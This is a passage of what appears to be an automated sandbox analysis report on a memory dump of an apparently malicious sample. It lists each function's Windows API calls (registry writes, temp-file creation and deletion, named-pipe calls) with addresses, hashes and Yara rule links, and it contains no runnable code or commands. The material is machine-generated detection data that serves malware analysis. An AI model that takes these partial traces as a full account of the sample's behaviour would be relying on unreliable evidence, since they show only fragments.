                                                            • Opcode Fuzzy Hash: 1279c040be775b5bbb6c69ba90f500a06a7682b4fec0d9337d0b1dc32abbc834
                                                            • Instruction Fuzzy Hash: F8113C75200209EFDB018F60EC48B6A3B69FB44361F109029FA06D5250DF35ED24FB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456D515, Relevance: 11.5, APIs: 9, Instructions: 269COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 7d5745adb142f05ef8190d7bf01350e03f3ad04154ba1c7f4e1f22dcfd0b0464
                                                            • Instruction ID: d2f1708ab9cf62dfc930218c65c4a3e7b294d362469a763b077d5abd2217d1fe
                                                            • Opcode Fuzzy Hash: 7d5745adb142f05ef8190d7bf01350e03f3ad04154ba1c7f4e1f22dcfd0b0464
                                                            • Instruction Fuzzy Hash: F3A11C71E00209EFEF22AFD4DC44AAEBBB5FF44318F144829E512B2160D771AA59EF11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045817B2, Relevance: 10.6, APIs: 7, Instructions: 137memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 045817DD
                                                            • StrTrimA.SHLWAPI(00000000,?), ref: 045817FA
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0458182D
                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 04581858
                                                            • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 0458191A
                                                              • Part of subcall function 0457BAE4: lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,04574A41,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000), ref: 0457BAED
                                                              • Part of subcall function 0457BAE4: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0457BB10
                                                              • Part of subcall function 0457BAE4: memset.NTDLL ref: 0457BB1F
                                                            • lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 045818CB
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 045818FA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                                            • String ID:
                                                            • API String ID: 239510280-0
                                                            • Opcode ID: c19fcc5835c3368ce7266f936fa1e032cbc0d6df69b806ababd6ce8d3833593d
                                                            • Instruction ID: 3d06e0fee9966434ac504f987c081f0ee482e3273e158cc9e08691bd62f591d9
                                                            • Opcode Fuzzy Hash: c19fcc5835c3368ce7266f936fa1e032cbc0d6df69b806ababd6ce8d3833593d
                                                            • Instruction Fuzzy Hash: 6C41F835600609FBEB12AB64EC85F9E7BA8FB44704F10006DF505BA280EF75AD45FB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456A27C, Relevance: 10.6, APIs: 7, Instructions: 125memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,?,?), ref: 0456A2D5
                                                            • lstrlen.KERNEL32(?,?,?), ref: 0456A2F3
                                                            • RtlAllocateHeap.NTDLL(00000000,73B76985,?), ref: 0456A31C
                                                            • memcpy.NTDLL(00000000,00000000,00000000), ref: 0456A333
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0456A346
                                                            • memcpy.NTDLL(00000000,?,?), ref: 0456A355
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 0456A3B9
                                                              • Part of subcall function 04569B15: RtlLeaveCriticalSection.NTDLL(?), ref: 04569B92
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                                                            • String ID:
                                                            • API String ID: 1635816815-0
                                                            • Opcode ID: ae76cc60e43973832f0855aa38b9c40dcbde9a127327e4c4bbe76846429af624
                                                            • Instruction ID: 9ef139ce3e6532602854c3ba92093cc82ea845dc300cd283c41fa2b5399cfb36
                                                            • Opcode Fuzzy Hash: ae76cc60e43973832f0855aa38b9c40dcbde9a127327e4c4bbe76846429af624
                                                            • Instruction Fuzzy Hash: 3841AE31600219EFDB21AFA8DC44A9E7BA9FF05354F154468F806B7260DB71EE54FB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04576AF1, Relevance: 10.6, APIs: 7, Instructions: 125memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,04564214,00000000,00000001,?,00000001,?), ref: 04576B08
                                                            • lstrlen.KERNEL32(?), ref: 04576B18
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04576B4C
                                                            • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 04576B77
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04576B96
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04576BF7
                                                            • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 04576C19
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Allocatelstrlenmemcpy$Free
                                                            • String ID:
                                                            • API String ID: 3204852930-0
                                                            • Opcode ID: f03411dddbc5f51c936ab92ed8007817be6b81bc2bc6adcff43ed5374f6c2eb2
                                                            • Instruction ID: 2bb4fed7a63fcb39253775b1a4f806e05f46011ad4de396c4b87642fc563cd1b
                                                            • Opcode Fuzzy Hash: f03411dddbc5f51c936ab92ed8007817be6b81bc2bc6adcff43ed5374f6c2eb2
                                                            • Instruction Fuzzy Hash: DD4125B190060AEFDB10DF95EC80AAE7FB9FF04358F144469E914A7211E731AA54AFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457511F, Relevance: 10.6, APIs: 7, Instructions: 123registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlImageNtHeader.NTDLL ref: 04575148
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 0457518B
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 045751A6
                                                            • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 045751FC
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 04575257
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 04575265
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04575270
                                                              • Part of subcall function 0456C547: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0456C55B
                                                              • Part of subcall function 0456C547: memcpy.NTDLL(00000000,0456F989,?,?,-00000005,?,0456F989,00000001,00000000,-00000005,00000001), ref: 0456C584
                                                              • Part of subcall function 0456C547: RegSetValueExA.ADVAPI32(?,00000001,00000000,00000003,00000000,?), ref: 0456C5AD
                                                              • Part of subcall function 0456C547: RegCloseKey.ADVAPI32(?,?,0456F989,00000001,00000000,-00000005,00000001), ref: 0456C5D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                                                            • String ID:
                                                            • API String ID: 3181710096-0
                                                            • Opcode ID: e264e40758e478af1c18b1914fe6b939e45b10a916c01878d479c8edd8527ef1
                                                            • Instruction ID: ec46178e0cf66741083d660df0e6c7fdfc1bd618f82ca8c72dfdda0d712e1db6
                                                            • Opcode Fuzzy Hash: e264e40758e478af1c18b1914fe6b939e45b10a916c01878d479c8edd8527ef1
                                                            • Instruction Fuzzy Hash: D6415C72600209FFEB219E65E885F6E37A8FB40795F144438FA46AA540EB35ED44FA60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04562B99, Relevance: 10.6, APIs: 7, Instructions: 111memoryfilestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(0458C00C), ref: 04562BAB
                                                            • lstrcpy.KERNEL32(00000000), ref: 04562BE7
                                                              • Part of subcall function 04574B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04561211,?), ref: 04574B72
                                                              • Part of subcall function 04574B63: mbstowcs.NTDLL ref: 04574B8E
                                                            • GetLastError.KERNEL32(00000000), ref: 04562C76
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04562C8D
                                                            • InterlockedDecrement.KERNEL32(0458C00C), ref: 04562CA4
                                                            • DeleteFileA.KERNEL32(00000000), ref: 04562CC5
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04562CD5
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                                                            • String ID:
                                                            • API String ID: 908044853-0
                                                            • Opcode ID: 9f63c65d2f389b96b89f30253fa67f8f6d1d74ed2ddcc5ad41a85c3d39dae9b2
                                                            • Instruction ID: b70d1c86349251d3670dbfa5e2c69754a11024e9c831371fd2dcafd8f1dde739
                                                            • Opcode Fuzzy Hash: 9f63c65d2f389b96b89f30253fa67f8f6d1d74ed2ddcc5ad41a85c3d39dae9b2
                                                            • Instruction Fuzzy Hash: 3031F636900115FBEB11AFA1D844AAD7BB8FF44745F118069F906AB140DA78AE44FB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04571841, Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 04571887
                                                            • StrTrimA.SHLWAPI(?,?), ref: 045718A5
                                                            • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 0457190E
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 0457192F
                                                            • DeleteFileA.KERNEL32(?,00003219), ref: 04571951
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04571960
                                                            • HeapFree.KERNEL32(00000000,?,00003219), ref: 04571978
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 1078934163-0
                                                            • Opcode ID: b1a6928512658f44ed9849edf27c4a69542ab051f3a997df21f481d161abe7d4
                                                            • Instruction ID: 119f934a6521e5e195529c9249d91832ce8dc16d5786a91ce4a96a31d8e8b39a
                                                            • Opcode Fuzzy Hash: b1a6928512658f44ed9849edf27c4a69542ab051f3a997df21f481d161abe7d4
                                                            • Instruction Fuzzy Hash: 2431AF32604606EFE311AB54EC44F6A77ECFB45B04F044428FA44B7291DF69FD0AABA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457DE22, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,04562DC7), ref: 0457DE3C
                                                            • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 0457DE51
                                                            • memset.NTDLL ref: 0457DE5E
                                                            • HeapFree.KERNEL32(00000000,00000000,?,0000001A,?,?,04562DC6,?,?), ref: 0457DE7B
                                                            • memcpy.NTDLL(?,?,04562DC6,?,0000001A,?,?,04562DC6,?,?), ref: 0457DE9C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Allocate$Freememcpymemset
                                                            • String ID: chun
                                                            • API String ID: 2362494589-3058818181
                                                            • Opcode ID: 3d181ffb816584ab8b808ada941064c3e2387ff14faa2e94381c9e885ae5fd7f
                                                            • Instruction ID: 21a44f1537d87f47cf8793a7407acae1a070dbd9170fc8a689656711ad15cc42
                                                            • Opcode Fuzzy Hash: 3d181ffb816584ab8b808ada941064c3e2387ff14faa2e94381c9e885ae5fd7f
                                                            • Instruction Fuzzy Hash: B4317C71500606EFD7219F6AE840E66BBF9FF54314F014429E949AB260DB30FD49EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04563EC6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            • lstrlen.KERNEL32(00000000,?,00000F00), ref: 04563EEA
                                                              • Part of subcall function 0456B869: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,04563F0E,?,00000000,000000FF,?,00000F00), ref: 0456B87A
                                                              • Part of subcall function 0456B869: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,04563F0E,?,00000000,000000FF,?,00000F00), ref: 0456B881
                                                              • Part of subcall function 0456B869: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0456B893
                                                              • Part of subcall function 0456B869: _snprintf.NTDLL ref: 0456B8B9
                                                              • Part of subcall function 0456B869: _snprintf.NTDLL ref: 0456B8ED
                                                              • Part of subcall function 0456B869: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 0456B90A
                                                            • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 04563F84
                                                            • HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 04563FA1
                                                            • DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000000,000000FF,?,00000F00), ref: 04563FA9
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF,?,00000F00), ref: 04563FB8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                                            • String ID: s:
                                                            • API String ID: 2960378068-2363032815
                                                            • Opcode ID: 0bcc2df0407b5382a7517fca3a605d232fe105c072188aaf8b6f105902693b68
                                                            • Instruction ID: 792b06e4b260d05eb77e84a2406f0e3f5cd9dc662631ac393845c8f2b7555a27
                                                            • Opcode Fuzzy Hash: 0bcc2df0407b5382a7517fca3a605d232fe105c072188aaf8b6f105902693b68
                                                            • Instruction Fuzzy Hash: 57314F72900246EFDB10ABE9DC84F9EBBBCFB48214F000559E505E3281EE78A904AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456A6F7, Relevance: 10.6, APIs: 7, Instructions: 89memorystringpipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(045647C4,00000000,00000000,?,?,?,045647C4,00000035,00000000,-00000005,00000000), ref: 0456A727
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0456A73D
                                                            • memcpy.NTDLL(00000010,045647C4,00000000,?,?,045647C4,00000035,00000000), ref: 0456A773
                                                            • memcpy.NTDLL(00000010,00000000,00000035,?,?,045647C4,00000035), ref: 0456A78E
                                                            • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0456A7AC
                                                            • GetLastError.KERNEL32(?,?,045647C4,00000035), ref: 0456A7B6
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,045647C4,00000035), ref: 0456A7D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                                            • String ID:
                                                            • API String ID: 2237239663-0
                                                            • Opcode ID: 6ba5d256aa0a6a7022ec88277aaab529979630967d1ac2d2059f8aef9d1635eb
                                                            • Instruction ID: ddde105c9698991a05b4eaaba8a6bf22228ed8a490a4fab701732cd23bfe8393
                                                            • Opcode Fuzzy Hash: 6ba5d256aa0a6a7022ec88277aaab529979630967d1ac2d2059f8aef9d1635eb
                                                            • Instruction Fuzzy Hash: 25318036500309EFDB21DF65D884A9BBBB8FB45751F104429F906E3211E634EE58EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457CDEA, Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 0457CE00
                                                            • lstrcmpiW.KERNEL32(00000000,?,73BCF710,?,?,?,04573066), ref: 0457CE38
                                                            • lstrcmpiW.KERNEL32(?,?,?,?,?,04573066), ref: 0457CE4D
                                                            • lstrlenW.KERNEL32(?,?,?,?,04573066), ref: 0457CE54
                                                            • CloseHandle.KERNEL32(?,?,?,?,04573066), ref: 0457CE7C
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,04573066), ref: 0457CEA8
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0457CEC6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                                            • String ID:
                                                            • API String ID: 1496873005-0
                                                            • Opcode ID: 457b0885b2a3faff318d69c9cc8f715e66d977fa2c05c13221cab1d33f5308bf
                                                            • Instruction ID: 3179411cff7e7a91c9a95aa9e330b6c14237558ea2d5aa37b910dcfd09585adb
                                                            • Opcode Fuzzy Hash: 457b0885b2a3faff318d69c9cc8f715e66d977fa2c05c13221cab1d33f5308bf
                                                            • Instruction Fuzzy Hash: 6A211B72900205EFEB229FB5EC84E6B77BCFF04644B04152DE906E2101EF35F909AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457EE4F, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(0456717C,00000000,0458C320,0458C340,?,?,0456717C,04562555,0458C320), ref: 0457EE5F
                                                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0457EE75
                                                            • lstrlen.KERNEL32(04562555,?,?,0456717C,04562555,0458C320), ref: 0457EE7D
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0457EE89
                                                            • lstrcpy.KERNEL32(0458C320,0456717C), ref: 0457EE9F
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,0456717C,04562555,0458C320), ref: 0457EEF3
                                                            • HeapFree.KERNEL32(00000000,0458C320,?,?,0456717C,04562555,0458C320), ref: 0457EF02
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                                            • String ID:
                                                            • API String ID: 1531811622-0
                                                            • Opcode ID: 409f5ab94717af22badedcd6d96181631675e772389f219c4067534fdbcccb7d
                                                            • Instruction ID: 5d3b39497bcbe2e9ed5e15a34d2346c03f4bafccba8c9b6fd29b00d2518ecd65
                                                            • Opcode Fuzzy Hash: 409f5ab94717af22badedcd6d96181631675e772389f219c4067534fdbcccb7d
                                                            • Instruction Fuzzy Hash: EA21B331104345EFEB224F69AC44F6A7F6AFB46350F1440A9F8946B252CA75AC09EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456C46F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,04562273,00000000), ref: 0456C493
                                                              • Part of subcall function 0457AC39: lstrcpy.KERNEL32(-000000FC,00000000), ref: 0457AC73
                                                              • Part of subcall function 0457AC39: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,0456C4A0,?,?,00000000,?,04562273,00000000), ref: 0457AC85
                                                              • Part of subcall function 0457AC39: GetTickCount.KERNEL32 ref: 0457AC90
                                                              • Part of subcall function 0457AC39: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,0456C4A0,?,?,00000000,?,04562273,00000000), ref: 0457AC9C
                                                              • Part of subcall function 0457AC39: lstrcpy.KERNEL32(00000000), ref: 0457ACB6
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • lstrcpy.KERNEL32(00000000), ref: 0456C4CE
                                                            • wsprintfA.USER32 ref: 0456C4E1
                                                            • GetTickCount.KERNEL32 ref: 0456C4F6
                                                            • wsprintfA.USER32 ref: 0456C50B
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                                            • String ID: "%S"
                                                            • API String ID: 1152860224-1359967185
                                                            • Opcode ID: e285e326f67aaadbe7fac6c3826e98dfb54a201b6aa3d548063bdbc403e23a04
                                                            • Instruction ID: 67f1516bbdc95e5294944b17daeedb4fa76592bef76f479ea7c2f99176d775c2
                                                            • Opcode Fuzzy Hash: e285e326f67aaadbe7fac6c3826e98dfb54a201b6aa3d548063bdbc403e23a04
                                                            • Instruction Fuzzy Hash: E411B172900316AFE2117B65AC84D5B379CFFA4A14F05401CF94AB7201DE79FC05ABB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04568DB4, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00001ED2,00000000,00000000,?,00000000,045777BB,?), ref: 04568DF5
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00001ED2,00000000,00000000,?,00000000,045777BB,?,00000000,00000000,00000000,00000000,00000000), ref: 04568E68
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 2078930461-0
                                                            • Opcode ID: 9cc0e4b6bca51fbc6a579e1b5d10abc7a038e5ff730576f6d768868e4111887a
                                                            • Instruction ID: cdf90504212ce5c21cdb3f1bf2a9e9445e559c271e4d882c243faf4682160c8b
                                                            • Opcode Fuzzy Hash: 9cc0e4b6bca51fbc6a579e1b5d10abc7a038e5ff730576f6d768868e4111887a
                                                            • Instruction Fuzzy Hash: B411EF31141319FBE7312A21EC4CF6F3F1DFB81764F100528F602A6192EA6AAC58F7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04577DB7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04569622: lstrlen.KERNEL32(00000000,00000000,73BB81D0,00000000,?,?,?,04577DD0,?,00000000,00000000,?,?,045763BE,00000000,049BB188), ref: 04569689
                                                              • Part of subcall function 04569622: sprintf.NTDLL ref: 045696AA
                                                            • lstrlen.KERNEL32(00000000,73BB81D0,?,00000000,00000000,?,?,045763BE,00000000,049BB188), ref: 04577DE2
                                                            • lstrlen.KERNEL32(?,?,?,045763BE,00000000,049BB188), ref: 04577DEA
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • strcpy.NTDLL ref: 04577E01
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04577E0C
                                                              • Part of subcall function 04571766: lstrlen.KERNEL32(?,?,?,00000000,?,04577E1B,00000000,?,?,?,045763BE,00000000,049BB188), ref: 04571777
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,045763BE,00000000,049BB188), ref: 04577E29
                                                              • Part of subcall function 04581D0B: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04577E35,00000000,?,?,045763BE,00000000,049BB188), ref: 04581D15
                                                              • Part of subcall function 04581D0B: _snprintf.NTDLL ref: 04581D73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                            • String ID: =
                                                            • API String ID: 2864389247-1428090586
